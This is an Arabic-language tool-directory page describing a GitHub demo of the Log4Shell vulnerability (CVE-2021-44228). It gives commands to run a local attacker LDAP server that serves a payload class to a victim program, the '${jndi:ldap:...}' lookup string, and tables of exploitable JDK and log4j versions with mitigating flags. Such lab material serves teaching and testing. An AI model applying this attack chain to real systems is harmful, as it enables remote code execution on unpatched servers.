Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
sample-ldap-exploit — عرض توضيحي قصير لـ CVE-2021-44228 | Kitploit
أدوات/GitHubGitHub/phoswald/sample-ldap-exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليمتطوير الحمولاتمختبرات وتدريب عمليArchived
GitHubphoswald/sample-ldap-exploit

sample-ldap-exploit

عرض توضيحي قصير لـ CVE-2021-44228

عرض المستودع
521منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

sample-ldap-exploit

عرض توضيحي قصير لـ CVE-2021-44228

البناء

root@kitploit:~
$ mvn clean verify

تشغيل المهاجم

root@kitploit:~
$ java \
  -cp 'attacker/target/sample-attacker.jar:attacker/target/lib/*' \
  sample.attacker.Attacker localhost 1389 sample.payload.Payload 8080 payload/target/sample-payload.jar

الروابط:

  • http://localhost:8080/
  • http://localhost:8080/sample/payload/Payload.class

تشغيل الضحية

root@kitploit:~
$ java \
  -cp 'victim/target/sample-victim.jar:victim/target/lib/*' \
  sample.victim.Victim

النتائج

JDK / JRE

الإصدارالحالة
Oracle JDK 8u5قابل للاختراق
OpenJDK 8u312غير قابل للاختراق (ما لم يتم تعيين -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
IBM OpenJDK 8u312-b07 (OpenJ9)غير قابل للاختراق (ما لم يتم تعيين -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
OpenJDK 11.0.7+10غير قابل للاختراق (ما لم يتم تعيين -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
OpenJDK 11.0.13+8غير قابل للاختراق (ما لم يتم تعيين -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
OpenJDK 16+36غير قابل للاختراق (ما لم يتم تعيين -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
OpenJDK 17+35غير قابل للاختراق (ما لم يتم تعيين -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
OpenJDK 17.0.1+12غير قابل للاختراق (ما لم يتم تعيين -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)

إذا لم يكن قابلًا للاختراق، فسيتم إرجاع مثيل من javax.naming.Reference من javax.naming.Context.lookup().

إذا لم يكن قابلًا للاختراق فيما يتعلق بتحميل الفئات من قواعد الشفرات البعيدة، فمن المحتمل أن ثغرات إلغاء التسلسل في Java لا تزال موجودة!

log4j

الإصدارالحالة
2.9.1قابل للاختراق
2.10.0قابل للاختراق (ما لم يتم تعيين -Dlog4j2.formatMsgNoLookups=true أو متغير البيئة LOG4J_FORMAT_MSG_NO_LOOKUPS=true)
2.14.1قابل للاختراق (ما لم يتم تعيين -Dlog4j2.formatMsgNoLookups=true أو متغير البيئة LOG4J_FORMAT_MSG_NO_LOOKUPS=true)
2.15.0غير قابل للاختراق

إذا لم يكن قابلًا للاختراق، فلن يتم تحليل ${jndi:ldap:...}.

تنزيل الأداة